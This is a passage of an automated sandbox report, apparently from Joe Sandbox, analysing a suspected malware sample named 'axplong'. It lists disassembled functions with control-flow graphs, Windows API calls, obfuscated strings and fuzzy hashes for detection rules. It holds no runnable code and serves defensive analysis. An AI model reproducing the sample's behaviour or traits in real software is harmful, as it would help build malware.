                      control_flow_graph 1305 8a82b0-8a8331 call 8d4020 1309 8a833d-8a8365 call 8b7870 call 8a5b20 1305->1309 1310 8a8333-8a8338 1305->1310 1318 8a8369-8a838b call 8b7870 call 8a5b20 1309->1318 1319 8a8367 1309->1319 1311 8a847f-8a849b call 8bcf21 1310->1311 1324 8a838f-8a83a8 1318->1324 1325 8a838d 1318->1325 1319->1318 1328 8a83aa-8a83b9 1324->1328 1329 8a83d9-8a8404 1324->1329 1325->1324 1330 8a83bb-8a83c9 1328->1330 1331 8a83cf-8a83d6 call 8bd593 1328->1331 1332 8a8431-8a8452 1329->1332 1333 8a8406-8a8415 1329->1333 1330->1331 1334 8a849c-8a84a1 call 8d6b9a 1330->1334 1331->1329 1338 8a8458-8a845d 1332->1338 1339 8a8454-8a8456 GetNativeSystemInfo 1332->1339 1336 8a8427-8a842e call 8bd593 1333->1336 1337 8a8417-8a8425 1333->1337 1336->1332 1337->1334 1337->1336 1343 8a845e-8a8465 1338->1343 1339->1343 1343->1311 1345 8a8467-8a846f 1343->1345 1348 8a8478-8a847b 1345->1348 1349 8a8471-8a8476 1345->1349 1348->1311 1350 8a847d 1348->1350 1349->1311 1350->1311
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?), ref: 008A8454
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: cc8eebfd0ffda4002dfac657b20c820f5624745cd56220e27f771fdece65e82a
                      • Instruction ID: a752bead02282939eade8cf76210c17be82472d44701c4293dc581e3398ed88b
                      • Opcode Fuzzy Hash: cc8eebfd0ffda4002dfac657b20c820f5624745cd56220e27f771fdece65e82a
                      • Instruction Fuzzy Hash: DA510770915218EBEB24EB28CD497DDB775FB46314F5042A9E804E77C1EF349A808BA5
                      Function 008D6C99 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1351 8d6c99-8d6ca5 1352 8d6cc4-8d6ce8 call 8d4020 1351->1352 1353 8d6ca7-8d6cc3 call 8d7430 call 8d7443 call 8d6b8a 1351->1353 1358 8d6cea-8d6d04 call 8d7430 call 8d7443 call 8d6b8a 1352->1358 1359 8d6d06-8d6d28 CreateFileW 1352->1359 1383 8d6d72-8d6d76 1358->1383 1362 8d6d38-8d6d3f call 8d6d77 1359->1362 1363 8d6d2a-8d6d2e call 8d6e01 1359->1363 1374 8d6d40-8d6d42 1362->1374 1370 8d6d33-8d6d36 1363->1370 1370->1374 1376 8d6d64-8d6d67 1374->1376 1377 8d6d44-8d6d61 call 8d4020 1374->1377 1379 8d6d69-8d6d6f 1376->1379 1380 8d6d70 1376->1380 1377->1376 1379->1380 1380->1383
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e540b117ebee228574799654f23600d88e70b8ea538bce20a6f5ef5f7a7270be
                      • Instruction ID: 7f3b9364811172c44ed1096bce6762a33f06cb4cbfd2757270cfcd5255017da1
                      • Opcode Fuzzy Hash: e540b117ebee228574799654f23600d88e70b8ea538bce20a6f5ef5f7a7270be
                      • Instruction Fuzzy Hash: 3E21D871A0160C6AEB117B68AC42B9E372AFF41338F204312F524EB3D1E7715D1596A2
                      Function 008D6F71 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1385 8d6f71-8d6f87 1386 8d6f89-8d6f8d 1385->1386 1387 8d6f97-8d6fa7 1385->1387 1386->1387 1388 8d6f8f-8d6f95 1386->1388 1391 8d6fa9-8d6fbb SystemTimeToTzSpecificLocalTime 1387->1391 1392 8d6fe7-8d6fea 1387->1392 1389 8d6fec-8d6ff7 call 8bcf21 1388->1389 1391->1392 1394 8d6fbd-8d6fdd call 8d6ff8 1391->1394 1392->1389 1397 8d6fe2-8d6fe5 1394->1397 1397->1389
                      APIs
                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 008D6FB3
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$LocalSpecificSystem
                      • String ID:
                      • API String ID: 2574697306-0
                      • Opcode ID: 68f907b0ecf63f6f84260728e3724f25d0c21819c4f0e071c3d6c4296c74f3d4
                      • Instruction ID: b560f1210025f373f19698a0355a0ade45060862a1ff156b681d5c2971ddeede
                      • Opcode Fuzzy Hash: 68f907b0ecf63f6f84260728e3724f25d0c21819c4f0e071c3d6c4296c74f3d4
                      • Instruction Fuzzy Hash: 9E11E8B290060CAACB10DF95D984EDFB7BCEF08310F605267E512E6280EB30EB54CB61
                      Function 052A071A Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1456 52a071a-52a071b 1457 52a06db-52a070b 1456->1457 1458 52a071d-52a07ed call 52a07b1 1456->1458 1457->1456 1472 52a07f9-52a0800 1458->1472 1473 52a0810 1472->1473 1474 52a0816-52a083f call 52a0841 1473->1474 1478 52a0841-52a08a6 1474->1478 1479 52a0804-52a080e 1474->1479 1479->1473
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID: `aXa
                      • API String ID: 0-463474586
                      • Opcode ID: 7e008bf693c905153335ce0901627d2bf8d860ec03d472d76448f8dd75b43180
                      • Instruction ID: b44986b8c0e0266b0f0e19be890afc876d654ff15aa59db9387ac5a7c7b92415
                      • Opcode Fuzzy Hash: 7e008bf693c905153335ce0901627d2bf8d860ec03d472d76448f8dd75b43180
                      • Instruction Fuzzy Hash: 6A113AAB0BC110EF5543CB815E8C9F6375BBE567707308036F84797543E2F5460989E5
                      Function 052A06FB Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1484 52a06fb-52a0800 call 52a07b1 1498 52a0810-52a083f call 52a0841 1484->1498 1503 52a0841-52a08a6 1498->1503 1504 52a0804-52a080e 1498->1504 1504->1498
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID: `aXa
                      • API String ID: 0-463474586
                      • Opcode ID: bb49acc713bab6902a828db6570c8865182e69049b80624ac749524c36b37aa3
                      • Instruction ID: ba437c7ced11a3938d1e4e13088524941402de6c2a37b83666e972ca6111f78d
                      • Opcode Fuzzy Hash: bb49acc713bab6902a828db6570c8865182e69049b80624ac749524c36b37aa3
                      • Instruction Fuzzy Hash: 37113AEB07C110FF9503DB515E9CAF77B6BAE957307708025F8479A143E2F5460989E4
                      Function 052A0779 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1509 52a0779-52a0790 1511 52a0792-52a07d9 call 52a07b1 1509->1511 1512 52a07e3-52a07e5 1509->1512 1513 52a07e7-52a0800 1511->1513 1512->1513 1518 52a0810-52a083f call 52a0841 1513->1518 1525 52a0841-52a08a6 1518->1525 1526 52a0804-52a080e 1518->1526 1526->1518
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID: `aXa
                      • API String ID: 0-463474586
                      • Opcode ID: 3a296eafa6f2ebc892b042aa4d047406ec1c6a9555634729dfa4fcf11d4251af
                      • Instruction ID: 123fbe509dfdda3fac771d94c12b6c6fe80159d4481d6d414137b27afbee72a6
                      • Opcode Fuzzy Hash: 3a296eafa6f2ebc892b042aa4d047406ec1c6a9555634729dfa4fcf11d4251af
                      • Instruction Fuzzy Hash: B7215BD74BD100BFD303D7519EAC5F63B6AEE573303314556E4868A053E1E1464A89E5
                      Function 052A0736 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1531 52a0736-52a0800 call 52a07b1 1543 52a0810-52a083f call 52a0841 1531->1543 1548 52a0841-52a08a6 1543->1548 1549 52a0804-52a080e 1543->1549 1549->1543
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID: `aXa
                      • API String ID: 0-463474586
                      • Opcode ID: fd34f495d64bf334b72765d91f853165de477555b8d9d5094ba09dc98aae865a
                      • Instruction ID: 911644695a66746e62cc6ddc9d1c789702956ec541c84d9234ccd7bc09e6b0ed
                      • Opcode Fuzzy Hash: fd34f495d64bf334b72765d91f853165de477555b8d9d5094ba09dc98aae865a
                      • Instruction Fuzzy Hash: 851157A717C110EFD643CBA15E9D9FA2B67AE53330730843AE84787543E2E5420D99A1
                      Function 052A0782 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID: `aXa
                      • API String ID: 0-463474586
                      • Opcode ID: 402ddc794f58f143454708f0128bf17cf8a055ba756509cfdc1bf2678127c1be
                      • Instruction ID: 59a3e5116d682455b43a3293d9929ddc387c59eae92880abc1e0d5e2b00c34d7
                      • Opcode Fuzzy Hash: 402ddc794f58f143454708f0128bf17cf8a055ba756509cfdc1bf2678127c1be
                      • Instruction Fuzzy Hash: D3012BA70BC100EF9506CB815D5D5BA7B57AF563307308426E8875A103E1F54A0959E5
                      Function 008B6AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 95bd1648ae35d8da4ea3d2dad80aae983a0eb4ab5fb59ef40cc82a3a7b345307
                      • Instruction ID: 10aa05201394d675acc22af89ebb3300768bb9d610a950a7cd668b0263659b5c
                      • Opcode Fuzzy Hash: 95bd1648ae35d8da4ea3d2dad80aae983a0eb4ab5fb59ef40cc82a3a7b345307
                      • Instruction Fuzzy Hash: C4F06271A14604ABC7007B6C9D07B5D7B75F747B64F800258E821A73D2EA34590487E3
                      Function 052A081D Relevance: .1, Instructions: 60COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 880669c8c40ca5372bd3ecaae24f581a1064a724c236901e212a76cd8ee25177
                      • Instruction ID: 68ebc120a71a36eb74125bf9c734a4f20d0a3129d05213c57e4d423f1399dd92
                      • Opcode Fuzzy Hash: 880669c8c40ca5372bd3ecaae24f581a1064a724c236901e212a76cd8ee25177
                      • Instruction Fuzzy Hash: B20149A74BC100FFC602DB805D8CAB67B2BBE5A3307318027F88759402E2F5860C9EE5
                      Function 052A07B1 Relevance: .1, Instructions: 57COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8ae346fa98e69504ed8ed58e2ac6a015785bd33f0abdc7c0ca4aceefad69e2ae
                      • Instruction ID: f2a5a935bccb01079ccb1d89fb6763241173416b6279508e92bbf06501f1dae6
                      • Opcode Fuzzy Hash: 8ae346fa98e69504ed8ed58e2ac6a015785bd33f0abdc7c0ca4aceefad69e2ae
                      • Instruction Fuzzy Hash: 58F0F9EB4BC000FF9602CB915A9C4B97E27BD963303318426F88755402F2E1861C99E4
                      Function 052A07CD Relevance: .1, Instructions: 51COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c3b7b5ad6108adff91d0c77a9c7da838a9a037df77689eb381dba5710a438e39
                      • Instruction ID: 95ba76bb052059300df041e6826835e9e1f1511e46e8ea87fae86d4c4a7f4d37
                      • Opcode Fuzzy Hash: c3b7b5ad6108adff91d0c77a9c7da838a9a037df77689eb381dba5710a438e39
                      • Instruction Fuzzy Hash: 2AF0F6B74BC000EF8602DB816E8C9797627BE96330335806AE8875A002E6F1461C9EF9
                      Function 052A07BC Relevance: .0, Instructions: 48COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 66d0b9b1516581dfb62a4252ef3fc6f2212e23cc27dbfd945d766c628c1f5a62
                      • Instruction ID: 67e2822c75ac0b0d6ee958a8f39be6afbff856c0aa08379453d8a1ff3efa9972
                      • Opcode Fuzzy Hash: 66d0b9b1516581dfb62a4252ef3fc6f2212e23cc27dbfd945d766c628c1f5a62
                      • Instruction Fuzzy Hash: 31F0BBA74BC010FF5606DB81598C9B57A27BE5A3307318026F88759412E2E5475C99E9
                      Function 052A07DE Relevance: .0, Instructions: 48COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 71f002c36a8f9dfba89e28a61ddb70a5979584df84543e0198924dc590979d46
                      • Instruction ID: 70871161f38bcc37d370ecb6a98a3c94920d7d5ad726ad14e88c09af506e31e0
                      • Opcode Fuzzy Hash: 71f002c36a8f9dfba89e28a61ddb70a5979584df84543e0198924dc590979d46
                      • Instruction Fuzzy Hash: 07F0E9D70BC010AF8545C6912A9C576766BBD96330331816BF8C355002E5D14B0D95B9

                      Non-executed Functions

                      Function 008AE440 Relevance: 14.8, Strings: 11, Instructions: 1000COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
                      • API String ID: 0-214772295
                      • Opcode ID: 99a9b43cbd232d669571861cef73885b75f07d080c8fd86fd62549143efb0eed
                      • Instruction ID: 96a5f09c53febe514284ed1cb6a2b16cada5ad03b982db90e986d92a0ec20ebd
                      • Opcode Fuzzy Hash: 99a9b43cbd232d669571861cef73885b75f07d080c8fd86fd62549143efb0eed
                      • Instruction Fuzzy Hash: 3A82C07090424C9BEF14EF68C9497DE7FB6FB46304F508198E805A73C2D7799A88CB92
                      Function 008E3068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: fa9ee4af209fd5c771e39797a48eb7f87155296ea7a6368d98136568259225fa
                      • Instruction ID: a346c314a414d91f42863eb879ebabb790e1ab723ffe1c4eae0a2cde48b5e5ce
                      • Opcode Fuzzy Hash: fa9ee4af209fd5c771e39797a48eb7f87155296ea7a6368d98136568259225fa
                      • Instruction Fuzzy Hash: 7AC24B71E086688FDB25CE29DD447E9B3B5FB8A314F1441EAD84EE7240E774AE818F41
                      Function 008E2BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction ID: 2d03bfc9a61781cc43aedfaedc5b88c941baf2028cb9084eadb3b44da07315ff
